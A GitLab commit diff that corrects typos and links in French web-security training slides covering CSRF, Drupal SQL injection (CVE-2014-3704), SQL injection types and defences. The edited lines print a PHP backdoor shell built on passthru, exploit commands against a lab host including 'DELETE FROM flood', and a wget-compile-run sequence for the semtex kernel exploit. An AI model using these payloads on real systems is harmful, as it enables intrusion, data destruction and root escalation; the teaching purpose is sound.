Skip to content
Snippets Groups Projects
Commit be49b71c authored by Vincent Mazenod's avatar Vincent Mazenod
Browse files

some fix

parent 9812e142
No related branches found
No related tags found
No related merge requests found
Pipeline #3626 passed
......@@ -218,5 +218,5 @@ X-Csrf-Token: i8XNjC4b8KVok4uw5RftR38Wgp2BFwql
* Côté client
* [RequestPolicy](https://addons.mozilla.org/fr/firefox/addon/requestpolicy) protège mais peut empêcher certains sites de fonctionner
* [CsFire](https://addons.mozilla.org/fr/firefox/addon/csfire) protège un peu en enlevant toute information d'authentification pour les requêtes cross-site
* [NoScript](https://addons.mozilla.org/fr/firefox/addon/noscript) va prémunir des scripts en provenance de de sites non sûrs
* [NoScript](https://addons.mozilla.org/fr/firefox/addon/noscript) va prémunir des scripts en provenance de sites non sûrs
* [Self-Destructing Cookies](https://addons.mozilla.org/fr/firefox/addon/self-destructing-cookies) permet de réduire la fenêtre d'attaque en supprimant les cookies dès qu'ils ne sont plus associé à un onglet actif
......@@ -69,8 +69,8 @@ foreach (array_filter($args, 'is_array') as $key => $data) {
```
* $i est un index de tableau de variables HTTP
* le contenu des clés de $new_keys est utilisé comme paramètre d'une requête SQL
* possibilité d'injecter du code SQL dans les clés des paramètres HTTP
* les valeurs des clés de $new_keys sont utilisées comme paramètres d'une requête SQL plus loin
* il y a donc possibilité d'injecter du code SQL dans les clés des paramètres HTTP
## La faille
......@@ -163,7 +163,7 @@ $data = file_get_contents($url . '?q=node&destination=node', 1, $ctx);
```
```shell
$ php attack/inject-sql.php 'http://drup.al' 'DELETE FROM flood'
$ php attack/inject-sql.php 'http://drup.al' 'DELETE FROM flood'
```
......@@ -172,7 +172,7 @@ $ php attack/inject-sql.php 'http://drup.al' 'DELETE FROM flood'
* [Drupal 7 Sql Injection SA-CORE-2014-005 CVE-2014-3704](http://www.homelab.it/index.php/2014/10/17/drupal-7-sql-injection/)
```shell
python drup4l_7_31_SqlInj_add_admin.py -t http://drup.al -u 1337 -p 1337
python drup4l_7_31_SqlInj_add_admin.py -t http://drup.al -u 1337 -p 1337
```
* représente 26% d'utilisation de la faille
* industrialisé pour vendre du viagra
......@@ -187,9 +187,9 @@ rerésente 68% des attaques
Simple backdoor shell
```php
$malicious_file_to_upload = '<?php
$malicious_file_to_upload = '<?php
if(isset($_REQUEST["cmd"])){
echo "&lt;pre&gt;";
echo "<pre>";
passthru($_REQUEST["cmd"]);
die;
}
......@@ -232,7 +232,7 @@ Note:
## exploitation
```shell
$ php attack/exploit.php 'http&#58;//drup.al'
$ php attack/exploit.php 'http://drup.al'
```
* [http://drup.al/sites/default/files/backdoor.php](http://drup.al.com/sites/default/files/backdoor.php)
......@@ -303,7 +303,8 @@ Note:
* kernel de 2.6.37 à 3.8.10
```shell
$ wget www.tux-planet.fr/public/hack/exploits/kernel/semtex.c
$ # www.tux-planet.fr/public/hack/exploits/kernel/semtex.c is dead
$ wget https://raw.githubusercontent.com/realtalk/cve-2013-2094/master/semtex.c
$ gcc -O2 semtex.c
$ ./a.out
$ whoami
......
......@@ -11,7 +11,7 @@
* L'attaquant envoie des séquences de texte permettant d'exploiter l'interpréteur visé
* toutes sources de données peut être utilisées
* paramètres HTTP, PATH_INFO, cookies, en-têtes HTTP, fichiers uploadés
* au niveau de la reque et [et de la réponse <i class="fa fa-reddit"></i>](http://i.imgur.com/8khrzf9.png)
* au niveau de la requête [et de la réponse <i class="fa fa-reddit"></i>](http://i.imgur.com/8khrzf9.png)
### <i class="fa fa-user-secret"></i> Que peut on faire?
......@@ -36,7 +36,7 @@ Note:
## [Différents types](https://www.linkedin.com/grp/post/36874-130061102)
#### [<i class="fa fa-eye"></i> Error-based]((https://www.owasp.org/index.php/SQL_Injection))
#### [<i class="fa fa-eye"></i> Error-based](https://www.owasp.org/index.php/SQL_Injection)
* Les messages d'erreur mysql sont accessibles
#### [<i class="fa fa-check-square"></i> Boolean (Blind)](https://www.owasp.org/index.php/Blind_SQL_Injection)
......@@ -286,7 +286,7 @@ devient pour fonctionner au niveau medium
```http
1 OR user_id > 0#
```
devient une encodée
devient une fois encodée
```http
1%20OR%20user_id%20%3E%200
......@@ -387,7 +387,7 @@ Note:
## <i class="fa fa-medkit"></i> Se préserver
* [Ne plus utiliser les fonctions mysql_ leur préférer mysqli_](http://stackoverflow.com/questions/548986/mysql-vs-mysqli-in-php)
* Utiliser des requêtes préparée
* Utiliser des requêtes préparées
* PDO, ORM : Doctrine2, Propel
* Être le plus silencieux possibles quant aux requêtes invalides
* [@](http://php.net/manual/fr/language.operators.errorcontrol.php) mais pas [or die()](http://php.net/manual/fr/function.die.php)
......
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment